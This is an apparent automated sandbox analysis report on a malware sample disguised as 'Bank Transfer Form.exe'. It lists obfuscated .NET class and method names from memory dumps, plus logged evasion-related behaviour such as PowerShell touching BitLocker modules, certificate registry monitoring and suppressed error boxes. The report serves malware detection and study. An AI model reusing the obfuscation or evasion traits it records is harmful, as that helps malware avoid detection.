                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, sy4xRxkBIgUYZjXBH8.csHigh entropy of concatenated method names: 'FDHMYKxYl', 'SOADinu0w', 'y21xQRAE9', 'vZimVoS0d', 'whTi74ctC', 'JYB1NfXIE', 'kDPevhZdyn7xh0J0RH', 'pnQSHjsS4yxDye4ZZa', 'u7PALJ4ku', 'ydVe0tljk'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, cNTAxyLngQ4wmnErdU.csHigh entropy of concatenated method names: 'HHVaKngIer', 'm7jausYccb', 'ToString', 'PlZahnIi2n', 't8sa52aUEV', 'pe2aC3JocW', 'wIdaYy18LW', 'VGbafGUjqg', 'to8a2ORRY4', 'Bjcaq0P3O5'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.csHigh entropy of concatenated method names: 'nkBQJ3iqmP', 'smOQhT0OPC', 'kIoQ5eQBZJ', 'nuVQC7eJgI', 'NInQYXP5cB', 'XEPQfWnMc9', 'U0ZQ25ZRQy', 'rvkQqPXdMW', 'TYQQTMhtK9', 'j59QKhm4Ef'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, lg884FPT14t8JDBNJj.csHigh entropy of concatenated method names: 'IBqfJx6MYO', 'cHCf5orYJH', 'F6MfYThPpJ', 'SUTf2aaHO0', 'u5xfqfhXfn', 'wXAY8JZODN', 'MfoYHBfSZj', 'ORQYVKqaCt', 'OOgYWG2TPL', 'ApfYl5w9pu'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, fafNrWNPmosQBQ9Hyh.csHigh entropy of concatenated method names: 'T9W92PHP2S', 'ejm9qZSALk', 'dLQ9KeObhS', 'SfT9ufWxS9', 'h9J9UerTg8', 'U4F9jT14t8', 'hryUc55iG5GAVx4FMr', 'hbwGACznxJgtRrXIhn', 'nCK995Y4VY', 'Oq79QxfQnw'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, W0luOeHPpUUnD0Gi9F.csHigh entropy of concatenated method names: 'SwjaW25Zr4', 'OZfaGRk12k', 'KNZA7iSVf6', 'IA2A9wvvfb', 'scqaohg2os', 'wtFa03K6PC', 'BZgapUtAA2', 'OC1aE12rG0', 'kF1aIkf2rO', 'R2Fatt9krh'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, sIYM2V99T3XKebu3Mfs.csHigh entropy of concatenated method names: 'Ln5eGFQVQw', 'EEiezM3X3G', 'XwXd7VqNCh', 'zMed9CMwsV', 'rRydkFDmSs', 'E8pdQOBm7K', 'sWrdNtgnlu', 'cdXdJ1p2Ey', 'zKRdheKVn6', 'ckad5Z4nNB'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, JaYZBb9Noi2bbtHjoAV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XF5ywKwRrJ', 'hD8yeOFWw8', 'uCQyd08j6L', 'erQyyfb71j', 'pyZy35JuvO', 'yJIyZ7GTmb', 'AsUy4G1o5A'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, XxS9LU1e3iUikC9Jer.csHigh entropy of concatenated method names: 'noiYvJ3g4i', 'daAYmUe5HV', 'KJICgbYHZ3', 'ji8CFa0fPf', 'lRmCRtQfvt', 'TisCcV9wHB', 'skRCsp6xyR', 'HmtCOVhdIu', 'kH4CXQDJuU', 'jg7CnaG1ti'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, DgcOPfs939iFMF7LnU.csHigh entropy of concatenated method names: 'AME2hBpFvu', 'UyR2C75sWm', 'w8M2fj5Z12', 'nJpfGOBPrU', 'fd3fz8TlJC', 'DXP27Id0Fg', 'hxy29FH72S', 'pZB2kgfDsI', 'iAh2Qi3QiX', 'qTp2N0ZrBK'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, OA8ZRtlmQ2cNhrw5CZ.csHigh entropy of concatenated method names: 'YRTwPPVhbe', 'd5WwBytxQ2', 'n3bwglwFvq', 'rqowFkq3Yn', 's0vwRbXecV', 'yNRwcE5kQ4', 'LgVwskrOqf', 'XOvwOo6Nik', 'z5lwXrejEE', 'ppDwnfNKAu'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, MA9tcoCn4p8ebb7jyP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cRqkl7YYrM', 'aT2kGpEgd6', 'amNkzHMhTM', 'UA4Q74qZwB', 'S1EQ9uQ8K1', 'eExQk2iek6', 'YVKQQqDLj5', 'WyBRQCjIsT01lbOWdIw'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, SqAFRrEyHODwOt21AL.csHigh entropy of concatenated method names: 'CXTUnxre4x', 'YX0U0ywSWh', 'S5wUEILNgQ', 'wqEUIOxlSm', 'w5FUBS96No', 'wfWUgomDRf', 'tQUUFOG15Z', 'gSrURajbD3', 'jIuUcFDORK', 'Qh4UsMo3q3'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, L4apYNiLQeObhStfTf.csHigh entropy of concatenated method names: 'RG6CDNOs43', 'qAoCxCWgI5', 'AGvCb4m0wo', 'OvfCiVlWuW', 'XrWCU3oYYx', 'N0BCjORV62', 'Q1qCaRKuHd', 'I7LCAKUWdL', 'MipCwGTrAj', 'JnECeMCPSX'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, DikMSDzLh1GP3ebiqj.csHigh entropy of concatenated method names: 'qDrexV8BFw', 'JIwebSbjbZ', 'Svnei2mcnK', 'Y4MePdS9qh', 'n6MeBDxgll', 'DqMeF2Rv5w', 'BYWeRHZbW6', 'I6ee4mJ4C9', 'FCte6f6lSH', 'LjYeSy2JQP'
                Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, GOdDuQpxLDLFynigs0.csHigh entropy of concatenated method names: 'hQJrbb9RBt', 'IYkriJrehr', 'NHQrPtUKce', 'w3irBLfbTT', 'E7prFmd3eY', 'gRsrR4dHEM', 'IQCrsBVaQ3', 'vq8rODnL5f', 'MqtrntPDlR', 'ikkro2aybS'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, YRJCD4GuTkTB5AFtUh.csHigh entropy of concatenated method names: 'sUteCUKxOF', 'aHYeYIgr7H', 'y6lefvIT1U', 'KWDe2CZ228', 'PZZewcLtKa', 'hnreqRgKGG', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, FyOPAW54oZ0b7HNW4y.csHigh entropy of concatenated method names: 'Dispose', 'U409luscwt', 'rYJkBqMk8m', 'a8al88GfCG', 'hFX9Gb9sHS', 'vgF9zP5qcW', 'ProcessDialogKey', 'iyok7A8ZRt', 'DQ2k9cNhrw', 'gCZkkGRJCD'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, WPHP2SbJjmZSALkB5D.csHigh entropy of concatenated method names: 'g0F5EsE8Ix', 'c0K5IoGB8X', 'yRK5tT8JaV', 'Cw95Lv2Rf2', 'n4m58kF2vq', 'uZq5HLNdOo', 'vqB5Vrf27o', 'jSk5WIHugE', 'EOl5lAFs5c', 'W265Gk4CB3'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, OrbTnwVH9840uscwtY.csHigh entropy of concatenated method names: 'IIqwU77tpg', 'KqtwaCr0VR', 'ti1wwI3P2W', 'khywdw3Duf', 'mqJw3llEb7', 'Cwow4GQXaq', 'Dispose', 'VZWAhW8Bb3', 'XtAA5gBYG4', 'HIjACjTA6V'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, DIv3B497lwTEGfxJNnW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LdgeoQj9PL', 'Qy8e00HZYo', 'pm3epIkOxU', 'yDIeEhSxhi', 'nBdeILVKnn', 'Vc0etMi0rp', 'MZTeLgZqkr'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, GK3rb8Xx6FpRmLh2PZ.csHigh entropy of concatenated method names: 'E8426mT4SH', 'QsQ2SW2wxt', 'UnO2M8H4pW', 'DUp2DdRPyM', 'qEk2vUkFBu', 'gOs2x9bYXE', 'rR22mCUorV', 'JQ02bhcOYC', 'Mft2iulPXg', 'O5D21vpN1J'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, sy4xRxkBIgUYZjXBH8.csHigh entropy of concatenated method names: 'FDHMYKxYl', 'SOADinu0w', 'y21xQRAE9', 'vZimVoS0d', 'whTi74ctC', 'JYB1NfXIE', 'kDPevhZdyn7xh0J0RH', 'pnQSHjsS4yxDye4ZZa', 'u7PALJ4ku', 'ydVe0tljk'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, cNTAxyLngQ4wmnErdU.csHigh entropy of concatenated method names: 'HHVaKngIer', 'm7jausYccb', 'ToString', 'PlZahnIi2n', 't8sa52aUEV', 'pe2aC3JocW', 'wIdaYy18LW', 'VGbafGUjqg', 'to8a2ORRY4', 'Bjcaq0P3O5'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.csHigh entropy of concatenated method names: 'nkBQJ3iqmP', 'smOQhT0OPC', 'kIoQ5eQBZJ', 'nuVQC7eJgI', 'NInQYXP5cB', 'XEPQfWnMc9', 'U0ZQ25ZRQy', 'rvkQqPXdMW', 'TYQQTMhtK9', 'j59QKhm4Ef'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, lg884FPT14t8JDBNJj.csHigh entropy of concatenated method names: 'IBqfJx6MYO', 'cHCf5orYJH', 'F6MfYThPpJ', 'SUTf2aaHO0', 'u5xfqfhXfn', 'wXAY8JZODN', 'MfoYHBfSZj', 'ORQYVKqaCt', 'OOgYWG2TPL', 'ApfYl5w9pu'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, fafNrWNPmosQBQ9Hyh.csHigh entropy of concatenated method names: 'T9W92PHP2S', 'ejm9qZSALk', 'dLQ9KeObhS', 'SfT9ufWxS9', 'h9J9UerTg8', 'U4F9jT14t8', 'hryUc55iG5GAVx4FMr', 'hbwGACznxJgtRrXIhn', 'nCK995Y4VY', 'Oq79QxfQnw'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, W0luOeHPpUUnD0Gi9F.csHigh entropy of concatenated method names: 'SwjaW25Zr4', 'OZfaGRk12k', 'KNZA7iSVf6', 'IA2A9wvvfb', 'scqaohg2os', 'wtFa03K6PC', 'BZgapUtAA2', 'OC1aE12rG0', 'kF1aIkf2rO', 'R2Fatt9krh'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, sIYM2V99T3XKebu3Mfs.csHigh entropy of concatenated method names: 'Ln5eGFQVQw', 'EEiezM3X3G', 'XwXd7VqNCh', 'zMed9CMwsV', 'rRydkFDmSs', 'E8pdQOBm7K', 'sWrdNtgnlu', 'cdXdJ1p2Ey', 'zKRdheKVn6', 'ckad5Z4nNB'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, JaYZBb9Noi2bbtHjoAV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XF5ywKwRrJ', 'hD8yeOFWw8', 'uCQyd08j6L', 'erQyyfb71j', 'pyZy35JuvO', 'yJIyZ7GTmb', 'AsUy4G1o5A'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, XxS9LU1e3iUikC9Jer.csHigh entropy of concatenated method names: 'noiYvJ3g4i', 'daAYmUe5HV', 'KJICgbYHZ3', 'ji8CFa0fPf', 'lRmCRtQfvt', 'TisCcV9wHB', 'skRCsp6xyR', 'HmtCOVhdIu', 'kH4CXQDJuU', 'jg7CnaG1ti'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, DgcOPfs939iFMF7LnU.csHigh entropy of concatenated method names: 'AME2hBpFvu', 'UyR2C75sWm', 'w8M2fj5Z12', 'nJpfGOBPrU', 'fd3fz8TlJC', 'DXP27Id0Fg', 'hxy29FH72S', 'pZB2kgfDsI', 'iAh2Qi3QiX', 'qTp2N0ZrBK'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, OA8ZRtlmQ2cNhrw5CZ.csHigh entropy of concatenated method names: 'YRTwPPVhbe', 'd5WwBytxQ2', 'n3bwglwFvq', 'rqowFkq3Yn', 's0vwRbXecV', 'yNRwcE5kQ4', 'LgVwskrOqf', 'XOvwOo6Nik', 'z5lwXrejEE', 'ppDwnfNKAu'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, MA9tcoCn4p8ebb7jyP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cRqkl7YYrM', 'aT2kGpEgd6', 'amNkzHMhTM', 'UA4Q74qZwB', 'S1EQ9uQ8K1', 'eExQk2iek6', 'YVKQQqDLj5', 'WyBRQCjIsT01lbOWdIw'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, SqAFRrEyHODwOt21AL.csHigh entropy of concatenated method names: 'CXTUnxre4x', 'YX0U0ywSWh', 'S5wUEILNgQ', 'wqEUIOxlSm', 'w5FUBS96No', 'wfWUgomDRf', 'tQUUFOG15Z', 'gSrURajbD3', 'jIuUcFDORK', 'Qh4UsMo3q3'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, L4apYNiLQeObhStfTf.csHigh entropy of concatenated method names: 'RG6CDNOs43', 'qAoCxCWgI5', 'AGvCb4m0wo', 'OvfCiVlWuW', 'XrWCU3oYYx', 'N0BCjORV62', 'Q1qCaRKuHd', 'I7LCAKUWdL', 'MipCwGTrAj', 'JnECeMCPSX'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, DikMSDzLh1GP3ebiqj.csHigh entropy of concatenated method names: 'qDrexV8BFw', 'JIwebSbjbZ', 'Svnei2mcnK', 'Y4MePdS9qh', 'n6MeBDxgll', 'DqMeF2Rv5w', 'BYWeRHZbW6', 'I6ee4mJ4C9', 'FCte6f6lSH', 'LjYeSy2JQP'
                Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, GOdDuQpxLDLFynigs0.csHigh entropy of concatenated method names: 'hQJrbb9RBt', 'IYkriJrehr', 'NHQrPtUKce', 'w3irBLfbTT', 'E7prFmd3eY', 'gRsrR4dHEM', 'IQCrsBVaQ3', 'vq8rODnL5f', 'MqtrntPDlR', 'ikkro2aybS'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, YRJCD4GuTkTB5AFtUh.csHigh entropy of concatenated method names: 'sUteCUKxOF', 'aHYeYIgr7H', 'y6lefvIT1U', 'KWDe2CZ228', 'PZZewcLtKa', 'hnreqRgKGG', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, FyOPAW54oZ0b7HNW4y.csHigh entropy of concatenated method names: 'Dispose', 'U409luscwt', 'rYJkBqMk8m', 'a8al88GfCG', 'hFX9Gb9sHS', 'vgF9zP5qcW', 'ProcessDialogKey', 'iyok7A8ZRt', 'DQ2k9cNhrw', 'gCZkkGRJCD'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, WPHP2SbJjmZSALkB5D.csHigh entropy of concatenated method names: 'g0F5EsE8Ix', 'c0K5IoGB8X', 'yRK5tT8JaV', 'Cw95Lv2Rf2', 'n4m58kF2vq', 'uZq5HLNdOo', 'vqB5Vrf27o', 'jSk5WIHugE', 'EOl5lAFs5c', 'W265Gk4CB3'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, OrbTnwVH9840uscwtY.csHigh entropy of concatenated method names: 'IIqwU77tpg', 'KqtwaCr0VR', 'ti1wwI3P2W', 'khywdw3Duf', 'mqJw3llEb7', 'Cwow4GQXaq', 'Dispose', 'VZWAhW8Bb3', 'XtAA5gBYG4', 'HIjACjTA6V'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, DIv3B497lwTEGfxJNnW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LdgeoQj9PL', 'Qy8e00HZYo', 'pm3epIkOxU', 'yDIeEhSxhi', 'nBdeILVKnn', 'Vc0etMi0rp', 'MZTeLgZqkr'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, GK3rb8Xx6FpRmLh2PZ.csHigh entropy of concatenated method names: 'E8426mT4SH', 'QsQ2SW2wxt', 'UnO2M8H4pW', 'DUp2DdRPyM', 'qEk2vUkFBu', 'gOs2x9bYXE', 'rR22mCUorV', 'JQ02bhcOYC', 'Mft2iulPXg', 'O5D21vpN1J'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, sy4xRxkBIgUYZjXBH8.csHigh entropy of concatenated method names: 'FDHMYKxYl', 'SOADinu0w', 'y21xQRAE9', 'vZimVoS0d', 'whTi74ctC', 'JYB1NfXIE', 'kDPevhZdyn7xh0J0RH', 'pnQSHjsS4yxDye4ZZa', 'u7PALJ4ku', 'ydVe0tljk'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, cNTAxyLngQ4wmnErdU.csHigh entropy of concatenated method names: 'HHVaKngIer', 'm7jausYccb', 'ToString', 'PlZahnIi2n', 't8sa52aUEV', 'pe2aC3JocW', 'wIdaYy18LW', 'VGbafGUjqg', 'to8a2ORRY4', 'Bjcaq0P3O5'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.csHigh entropy of concatenated method names: 'nkBQJ3iqmP', 'smOQhT0OPC', 'kIoQ5eQBZJ', 'nuVQC7eJgI', 'NInQYXP5cB', 'XEPQfWnMc9', 'U0ZQ25ZRQy', 'rvkQqPXdMW', 'TYQQTMhtK9', 'j59QKhm4Ef'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, lg884FPT14t8JDBNJj.csHigh entropy of concatenated method names: 'IBqfJx6MYO', 'cHCf5orYJH', 'F6MfYThPpJ', 'SUTf2aaHO0', 'u5xfqfhXfn', 'wXAY8JZODN', 'MfoYHBfSZj', 'ORQYVKqaCt', 'OOgYWG2TPL', 'ApfYl5w9pu'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, fafNrWNPmosQBQ9Hyh.csHigh entropy of concatenated method names: 'T9W92PHP2S', 'ejm9qZSALk', 'dLQ9KeObhS', 'SfT9ufWxS9', 'h9J9UerTg8', 'U4F9jT14t8', 'hryUc55iG5GAVx4FMr', 'hbwGACznxJgtRrXIhn', 'nCK995Y4VY', 'Oq79QxfQnw'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, W0luOeHPpUUnD0Gi9F.csHigh entropy of concatenated method names: 'SwjaW25Zr4', 'OZfaGRk12k', 'KNZA7iSVf6', 'IA2A9wvvfb', 'scqaohg2os', 'wtFa03K6PC', 'BZgapUtAA2', 'OC1aE12rG0', 'kF1aIkf2rO', 'R2Fatt9krh'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, sIYM2V99T3XKebu3Mfs.csHigh entropy of concatenated method names: 'Ln5eGFQVQw', 'EEiezM3X3G', 'XwXd7VqNCh', 'zMed9CMwsV', 'rRydkFDmSs', 'E8pdQOBm7K', 'sWrdNtgnlu', 'cdXdJ1p2Ey', 'zKRdheKVn6', 'ckad5Z4nNB'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, JaYZBb9Noi2bbtHjoAV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XF5ywKwRrJ', 'hD8yeOFWw8', 'uCQyd08j6L', 'erQyyfb71j', 'pyZy35JuvO', 'yJIyZ7GTmb', 'AsUy4G1o5A'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, XxS9LU1e3iUikC9Jer.csHigh entropy of concatenated method names: 'noiYvJ3g4i', 'daAYmUe5HV', 'KJICgbYHZ3', 'ji8CFa0fPf', 'lRmCRtQfvt', 'TisCcV9wHB', 'skRCsp6xyR', 'HmtCOVhdIu', 'kH4CXQDJuU', 'jg7CnaG1ti'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, DgcOPfs939iFMF7LnU.csHigh entropy of concatenated method names: 'AME2hBpFvu', 'UyR2C75sWm', 'w8M2fj5Z12', 'nJpfGOBPrU', 'fd3fz8TlJC', 'DXP27Id0Fg', 'hxy29FH72S', 'pZB2kgfDsI', 'iAh2Qi3QiX', 'qTp2N0ZrBK'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, OA8ZRtlmQ2cNhrw5CZ.csHigh entropy of concatenated method names: 'YRTwPPVhbe', 'd5WwBytxQ2', 'n3bwglwFvq', 'rqowFkq3Yn', 's0vwRbXecV', 'yNRwcE5kQ4', 'LgVwskrOqf', 'XOvwOo6Nik', 'z5lwXrejEE', 'ppDwnfNKAu'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, MA9tcoCn4p8ebb7jyP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cRqkl7YYrM', 'aT2kGpEgd6', 'amNkzHMhTM', 'UA4Q74qZwB', 'S1EQ9uQ8K1', 'eExQk2iek6', 'YVKQQqDLj5', 'WyBRQCjIsT01lbOWdIw'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, SqAFRrEyHODwOt21AL.csHigh entropy of concatenated method names: 'CXTUnxre4x', 'YX0U0ywSWh', 'S5wUEILNgQ', 'wqEUIOxlSm', 'w5FUBS96No', 'wfWUgomDRf', 'tQUUFOG15Z', 'gSrURajbD3', 'jIuUcFDORK', 'Qh4UsMo3q3'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, L4apYNiLQeObhStfTf.csHigh entropy of concatenated method names: 'RG6CDNOs43', 'qAoCxCWgI5', 'AGvCb4m0wo', 'OvfCiVlWuW', 'XrWCU3oYYx', 'N0BCjORV62', 'Q1qCaRKuHd', 'I7LCAKUWdL', 'MipCwGTrAj', 'JnECeMCPSX'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, DikMSDzLh1GP3ebiqj.csHigh entropy of concatenated method names: 'qDrexV8BFw', 'JIwebSbjbZ', 'Svnei2mcnK', 'Y4MePdS9qh', 'n6MeBDxgll', 'DqMeF2Rv5w', 'BYWeRHZbW6', 'I6ee4mJ4C9', 'FCte6f6lSH', 'LjYeSy2JQP'
                Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, GOdDuQpxLDLFynigs0.csHigh entropy of concatenated method names: 'hQJrbb9RBt', 'IYkriJrehr', 'NHQrPtUKce', 'w3irBLfbTT', 'E7prFmd3eY', 'gRsrR4dHEM', 'IQCrsBVaQ3', 'vq8rODnL5f', 'MqtrntPDlR', 'ikkro2aybS'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
